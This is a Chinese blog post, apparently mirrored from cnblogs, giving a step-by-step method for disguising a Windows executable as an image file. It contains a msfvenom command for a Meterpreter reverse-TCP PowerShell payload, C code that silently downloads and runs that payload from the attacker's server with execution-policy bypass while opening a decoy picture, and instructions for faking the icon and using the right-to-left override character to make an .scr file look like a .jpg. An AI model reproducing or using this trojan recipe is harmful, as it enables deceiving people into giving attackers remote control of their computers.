zoukankan      html  css  js  c++  java
  • 【奇淫技巧】图片伪装大法--伪装可执行文

    能够将可执行文件伪装成图片

    用到的工具: kali 2.0、msfasploit、Resource Hacker

    首先利用msfvenom生成一个powershell的ps1文件

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 lport=2234 -f psh-reflection>/var/www/html/payload.ps1

    随后开启apache服务

    service apache2 start

    然后找两张png和ico一模一样的图片

    一样放到apache目录下

    接下来在windows系统上编译如下代码

    #include <stdio.h>
    #include <windows.h>
    int main()
    {
    system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.149.129/shot.png', 'C:\Users\Public\shot.png') & start C:\Users\Public\shot.png & powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.149.129/payload.ps1');test.ps1"");
    return 0;
    }

    这串代码会远程下载shot.png,并保持在本地。然后马上打开它!!

    这时候,把编译好的恶意程序的图标改成shot.png一样的图片就可以伪装成一张图了。这时候你打开不仅仅会打开本地下载好的图片,而且还会执行我们的payload.ps1

    下面就说如何更改图标

    下载一个Resource Hacker

    open一个可执行文件--》Add Binary--》添加完图标后保存

    然后就在桌面上出现一个demon.exe

    这时候还没完,我们把他改成“gpj.scr”格式

    不用担心改成scr格式文件就无法运行了

    接下来我们利用系统专有的从右至左 (Right-to-Left) 的字符重写  (RLO)控制字符来达到迷惑的效果

     先改成gpj.scr  然后吧光标放在gpj的前面,再右键改字符

    我们来试试效果:

    配置好msf反弹

    可以看到,运行rcs.jpg之后,直接打开了图片并且msf弹回了shell。

  • 相关阅读:
    使用没有初始化变量很危险
    openssl动态库编译
    数据库水平切分及问题
    用dpkg命令制作deb包方法总结
    centOS安装mysql---glibc方式
    RabbitMQ常用命令
    shell脚本报错:-bash: xxx: /bin/bash^M: bad interpreter: No such file or directory
    mysql主从复制实现数据库同步
    CentOS 7.0下使用yum安装MySQL
    RabbitMQ的远程Web管理与监控工具
  • 原文地址:https://www.cnblogs.com/wh4am1/p/7533914.html
Copyright © 2011-2022 走看看